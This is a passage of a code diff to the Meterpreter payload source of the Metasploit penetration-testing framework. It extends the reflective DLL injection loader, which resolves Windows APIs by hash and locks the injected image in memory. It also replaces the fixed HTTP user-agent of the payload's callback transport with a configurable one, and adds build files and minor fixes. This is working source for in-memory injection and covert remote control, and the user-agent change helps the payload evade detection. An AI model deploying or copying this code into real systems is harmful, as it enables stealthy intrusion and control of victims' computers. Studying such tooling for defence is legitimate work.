@@ -36,6 +36,7 @@ UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
+
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
@@ -53,6 +54,9 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
+ VIRTUALLOCK pVirtualLock;
+ OUTPUTDEBUG pOutputDebug;
+
USHORT usCounter;
// the initial location of this image in memory
@@ -73,15 +77,21 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
+ UINT_PTR uiValueE;
+
+ register UINT_PTR inspect;
// STEP 0: calculate our images current base address
-
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
- __asm call geteip
- __asm geteip: pop uiLibraryAddress
+ __asm {
+ call geteip
+geteip:
+ pop uiLibraryAddress
+ }
+
#endif
// loop through memory backwards searching for our images base address
@@ -103,7 +113,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
}
uiLibraryAddress--;
}
-
+
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
@@ -130,7 +140,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
do
{
uiValueC = ror( (DWORD)uiValueC );
- // normalize to uppercase if the madule name is in lowercase
+ // normalize to uppercase if the module name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
@@ -163,7 +173,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
- usCounter = 3;
+ usCounter = 5;
// loop while we still have imports to find
while( usCounter > 0 )
@@ -172,7 +182,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
- if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
+ if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
@@ -187,7 +197,10 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
+ else if( dwHashValue == VIRTUALLOCK_HASH )
+ pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+ else if( dwHashValue == OUTPUTDEBUG_HASH )
+ pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
@@ -207,6 +220,9 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+ // prevent our image from being swapped to the pagefile
+ pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
@@ -214,13 +230,16 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
+
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-
- // itterate through all sections, loading them into memory.
- while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
+
+ uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
+
+ // iterate through all sections, loading them into memory.
+ while( uiValueE-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
@@ -236,21 +255,33 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
+
// STEP 4: process our images import table...
+
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-
- // we assume their is an import table to process
- // uiValueC is the first entry in the import table
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // itterate through all imports
- while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
+ uiValueC = ( uiBaseAddress + (UINT_PTR)((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
+
+ // iterate through all imports until a null RVA is found (Characteristics is mis-named)
+ while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
{
+ /*
+ pOutputDebug("Loading library: ");
+ pOutputDebug((LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ));
+ pOutputDebug("\n");
+ */
+
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
+ if (! uiLibraryAddress) {
+ //pOutputDebug("Loading library FAILED\n");
+ // get the next import
+ uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
+ continue;
+ }
+
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
@@ -285,9 +316,15 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
+ /*
+ pOutputDebug("Resolving function: ");
+ pOutputDebug((LPCSTR)( (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ));
+ pOutputDebug("\n");
+ */
// use GetProcAddress and patch in the address for this imported function
- DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
+ DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
+
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
@@ -299,6 +336,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
+
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
@@ -307,13 +345,13 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
- // check if their are any relocations present
+ // check if there are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
- // and we itterate through all entries...
+ // and we iterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h
index b8f9112b8e..fc54cc501c 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h
@@ -42,11 +42,15 @@
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
+typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T);
+typedef LPVOID (WINAPI * OUTPUTDEBUG)(LPCSTR);
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
+#define VIRTUALLOCK_HASH 0x0ef632f2
+#define OUTPUTDEBUG_HASH 0x470d22bc
#define HASH_KEY 13
//===============================================================================================//
@@ -70,6 +74,7 @@ __forceinline DWORD hash( char * c )
return h;
}
+
//===============================================================================================//
typedef struct _UNICODE_STR
{
@@ -192,6 +197,8 @@ typedef struct
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
+
+
//===============================================================================================//
#endif
//===============================================================================================//
diff --git a/external/source/meterpreter/source/backcompat/backcompat.asm b/external/source/meterpreter/source/backcompat/backcompat.asm
new file mode 100644
index 0000000000..fbe3c1c76c
--- /dev/null
+++ b/external/source/meterpreter/source/backcompat/backcompat.asm
@@ -0,0 +1,24 @@
+.model flat, C
+
+.data
+__imp__EncodePointer@4 dd dummy
+__imp__DecodePointer@4 dd dummy
+__imp__HeapSetInformation@16 dd dummy2
+
+EXTERNDEF __imp__EncodePointer@4 : DWORD
+EXTERNDEF __imp__DecodePointer@4 : DWORD
+EXTERNDEF __imp__HeapSetInformation@16 : DWORD
+
+.code
+
+dummy proc
+mov eax, [esp+4]
+ret 4
+dummy endp
+
+dummy2 proc
+mov eax, 1
+ret 10h
+dummy2 endp
+
+end
\ No newline at end of file
diff --git a/external/source/meterpreter/source/common/common.h b/external/source/meterpreter/source/common/common.h
index 8ef632887f..85a3d4adf8 100644
--- a/external/source/meterpreter/source/common/common.h
+++ b/external/source/meterpreter/source/common/common.h
@@ -129,10 +129,11 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
#ifdef _WIN32
+
#include
// Enable debugging
-// #define DEBUGTRACE 1
+//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)
diff --git a/external/source/meterpreter/source/extensions/priv/server/priv.c b/external/source/meterpreter/source/extensions/priv/server/priv.c
index 5be0572f12..a75fa84b8b 100644
--- a/external/source/meterpreter/source/extensions/priv/server/priv.c
+++ b/external/source/meterpreter/source/extensions/priv/server/priv.c
@@ -13,7 +13,6 @@
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
-//#include "../../../ReflectiveDLLInjection/ReflectiveLoader.c"
Command customCommands[] =
{
diff --git a/external/source/meterpreter/source/extensions/sniffer/precomp.h b/external/source/meterpreter/source/extensions/sniffer/precomp.h
new file mode 100644
index 0000000000..3730d7f862
--- /dev/null
+++ b/external/source/meterpreter/source/extensions/sniffer/precomp.h
@@ -0,0 +1,23 @@
+#ifndef METERPRETER_SOURCE_EXTENSION_SNIFFER_SERVER_PRECOMP_H
+#define METERPRETER_SOURCE_EXTENSION_SNIFFER_SERVER_PRECOMP_H
+
+#define _WIN32_WINNT 0x0400
+
+#include "sniffer.h"
+
+#ifdef _WIN32
+
+#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
+#include "../../ReflectiveDLLInjection/GetProcAddressR.h"
+#include "../../ReflectiveDLLInjection/ReflectiveLoader.h"
+
+// declared in ReflectiveLoader.c and set by DllMain also in ReflectiveLoader.c
+extern HINSTANCE hAppInstance;
+
+#endif
+
+#define strcasecmp stricmp
+
+
+
+#endif
diff --git a/external/source/meterpreter/source/extensions/sniffer/sniffer.c b/external/source/meterpreter/source/extensions/sniffer/sniffer.c
index a5b8652f2f..c2e06260cb 100644
--- a/external/source/meterpreter/source/extensions/sniffer/sniffer.c
+++ b/external/source/meterpreter/source/extensions/sniffer/sniffer.c
@@ -2,27 +2,32 @@
* This module implements packet sniffing features
*/
#define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
-#include "sniffer.h"
+
+#include "precomp.h"
+
#ifdef _WIN32
-#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
-// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
+// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
+// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
+
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
+
#define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){packet_transmit_response(hErr, remote, response);return(hErr);}
HANDLE hMgr;
DWORD hErr;
DWORD pktsdk_initialize(void) {
+ dprintf("sniffer>> calling MgrCreate()...");
+
hMgr = MgrCreate();
if(! hMgr){
dprintf("sniffer>> failed to allocate a new Mgr object");
@@ -60,6 +65,10 @@ void __stdcall sniffer_receive(DWORD_PTR Param, DWORD_PTR ThParam, HANDLE hPacke
#else // posix side
+#include "sniffer.h"
+#include "../../common/common.h"
+
+
#define check_pssdk()
char *get_interface_name_by_index(unsigned int fidx)
@@ -671,7 +680,7 @@ DWORD request_sniffer_capture_start(Remote *remote, Packet *packet) {
#endif
- j->pkts = calloc(maxp, sizeof(HANDLE));
+ j->pkts = (HANDLE *) calloc(maxp, sizeof(HANDLE));
if(j->pkts == NULL) {
#ifdef _WIN32
AdpCloseAdapter(j->adp);
@@ -1089,6 +1098,8 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
DWORD index;
+ hMetSrv = remote->hMetSrv;
+
dprintf("[SERVER] Registering command handlers...");
for (index = 0; customCommands[index].method; index++) {
dprintf("Registering command index %d", index);
diff --git a/external/source/meterpreter/source/extensions/sniffer/sniffer.h b/external/source/meterpreter/source/extensions/sniffer/sniffer.h
index 79d4da60d8..6b46f71e71 100644
--- a/external/source/meterpreter/source/extensions/sniffer/sniffer.h
+++ b/external/source/meterpreter/source/extensions/sniffer/sniffer.h
@@ -1,108 +1,110 @@
-#ifndef _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
-#define _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
-
-#ifdef _WIN32
-
-#include
-#include
-
-#include "HNPsSdkUser.h"
-#include "dnet.h"
-
-#else
-
-#include
-
-#ifndef ERROR_ACCESS_DENIED
- #define ERROR_ACCESS_DENIED EACCES
-#endif
-
-#endif
-
-#include "../../common/common.h"
-
-typedef struct capturejob
-{
- unsigned int active;
- unsigned int intf;
- unsigned int max_pkts;
- unsigned int idx_pkts;
- unsigned int cur_pkts;
- unsigned int cur_bytes;
- unsigned int mtu;
- HANDLE adp;
- HANDLE *pkts;
- unsigned char *dbuf;
- unsigned int dlen;
- unsigned int didx;
- int capture_linktype; //current capture link type that we want to save, ie. LINKTYPE_ETHERNET
-#ifndef _WIN32
- THREAD *thread;
- pcap_t *pcap;
-#endif
-} CaptureJob;
-
-#define TLV_TYPE_EXTENSION_SNIFFER 0
-
-
-#define TLV_TYPE_SNIFFER_INTERFACES \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 1)
-
-#define TLV_TYPE_SNIFFER_INTERFACE_ID \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 2)
-
-#define TLV_TYPE_SNIFFER_INTERFACE_HANDLE \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 3)
-
-#define TLV_TYPE_SNIFFER_PACKET_COUNT \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 4)
-
-#define TLV_TYPE_SNIFFER_BYTE_COUNT \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 5)
-
-#define TLV_TYPE_SNIFFER_EXCLUDE_PORTS \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 6)
-
-#define TLV_TYPE_SNIFFER_INCLUDE_PORTS \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 7)
-
-#define TLV_TYPE_SNIFFER_PACKETS \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 8)
-
-#define TLV_TYPE_SNIFFER_PACKET \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_RAW, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 9)
-
-#define TLV_TYPE_SNIFFER_ADDITIONAL_FILTER \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_STRING, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 10)
-
-#endif
+#ifndef _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
+#define _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
+
+#ifdef _WIN32
+
+#include "../../common/common.h"
+
+#include
+#include
+
+#include
+#include "dnet.h"
+
+#else
+
+#include
+
+#ifndef ERROR_ACCESS_DENIED
+ #define ERROR_ACCESS_DENIED EACCES
+#endif
+
+#endif
+
+#include "../../common/common.h"
+
+typedef struct capturejob
+{
+ unsigned int active;
+ unsigned int intf;
+ unsigned int max_pkts;
+ unsigned int idx_pkts;
+ unsigned int cur_pkts;
+ unsigned int cur_bytes;
+ unsigned int mtu;
+ HANDLE adp;
+ HANDLE *pkts;
+ unsigned char *dbuf;
+ unsigned int dlen;
+ unsigned int didx;
+ int capture_linktype; //current capture link type that we want to save, ie. LINKTYPE_ETHERNET
+#ifndef _WIN32
+ THREAD *thread;
+ pcap_t *pcap;
+#endif
+} CaptureJob;
+
+#define TLV_TYPE_EXTENSION_SNIFFER 0
+
+
+#define TLV_TYPE_SNIFFER_INTERFACES \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 1)
+
+#define TLV_TYPE_SNIFFER_INTERFACE_ID \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 2)
+
+#define TLV_TYPE_SNIFFER_INTERFACE_HANDLE \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 3)
+
+#define TLV_TYPE_SNIFFER_PACKET_COUNT \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 4)
+
+#define TLV_TYPE_SNIFFER_BYTE_COUNT \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 5)
+
+#define TLV_TYPE_SNIFFER_EXCLUDE_PORTS \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 6)
+
+#define TLV_TYPE_SNIFFER_INCLUDE_PORTS \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 7)
+
+#define TLV_TYPE_SNIFFER_PACKETS \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 8)
+
+#define TLV_TYPE_SNIFFER_PACKET \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_RAW, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 9)
+
+#define TLV_TYPE_SNIFFER_ADDITIONAL_FILTER \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_STRING, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 10)
+
+#endif
diff --git a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
index 6fa78e7fc6..c61fed7469 100644
--- a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
+++ b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
@@ -377,6 +377,13 @@ DWORD request_sys_config_sysinfo(Remote *remote, Packet *packet)
else
osName = "Windows 2008 R2";
}
+ else if (v.dwMajorVersion == 6 && v.dwMinorVersion == 2)
+ {
+ if (v.wProductType == VER_NT_WORKSTATION)
+ osName = "Windows 8";
+ else
+ osName = "Windows 2012";
+ }
if (!osName)
osName = "Unknown";
diff --git a/external/source/meterpreter/source/server/metsrv.h b/external/source/meterpreter/source/server/metsrv.h
index ca5a65e49a..52044dec74 100644
--- a/external/source/meterpreter/source/server/metsrv.h
+++ b/external/source/meterpreter/source/server/metsrv.h
@@ -12,6 +12,9 @@
#ifdef _WIN32
+
+#define _WIN32_WINNT 0x0500
+
#define USE_DLL
#endif
#define METERPRETER_EXPORTS
diff --git a/external/source/meterpreter/source/server/server_setup.c b/external/source/meterpreter/source/server/server_setup.c
index c0e2c4b4a1..850e22db1f 100644
--- a/external/source/meterpreter/source/server/server_setup.c
+++ b/external/source/meterpreter/source/server/server_setup.c
@@ -4,6 +4,7 @@
char * global_meterpreter_transport = "METERPRETER_TRANSPORT_SSL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char * global_meterpreter_url = "https://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/\x00";
+char * global_meterpreter_ua = "METERPRETER_UA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
int global_expiration_timeout = 0xb64be661;
int global_comm_timeout = 0xaf79257f;
@@ -401,7 +402,7 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
remote->comm_last_packet = current_unix_timestamp();
// Allocate the top-level handle
- remote->hInternet = InternetOpen("Meterpreter/Windows", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
+ remote->hInternet = InternetOpen(global_meterpreter_ua, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (!remote->hInternet) {
dprintf("[DISPATCH] Failed InternetOpen: %d", GetLastError());
return 0;
diff --git a/external/source/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj b/external/source/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj
new file mode 100644
index 0000000000..1f727f1924
--- /dev/null
+++ b/external/source/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj
@@ -0,0 +1,189 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {72F0246A-A38D-4547-9057-46020E8E503D}
+ ReflectiveDLLInjection
+ Win32Proj
+
+
+
+ StaticLibrary
+ Unicode
+ false
+
+
+ StaticLibrary
+ Unicode
+
+
+ StaticLibrary
+ MultiByte
+ true
+
+
+ StaticLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ libcmtd;%(IgnoreSpecificDefaultLibraries)
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN64;_DEBUG;_LIB;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ libcmtd;%(IgnoreSpecificDefaultLibraries)
+
+
+
+
+ Disabled
+ false
+ false
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+
+
+ Level4
+ ProgramDatabase
+ CompileAsC
+ Default
+ Size
+ false
+
+
+ .\Release/ReflectiveDllInjection.lib
+ backcompat.lib
+ ..\backcompat\Release\
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ true
+ false
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN64;NDEBUG;_LIB;%(PreprocessorDefinitions)
+ MultiThreaded
+ true
+
+
+ Level3
+ ProgramDatabase
+ CompileAsC
+
+
+ .\Release/ReflectiveDllInjection.lib
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj
new file mode 100644
index 0000000000..2b94a53580
--- /dev/null
+++ b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj
@@ -0,0 +1,101 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+
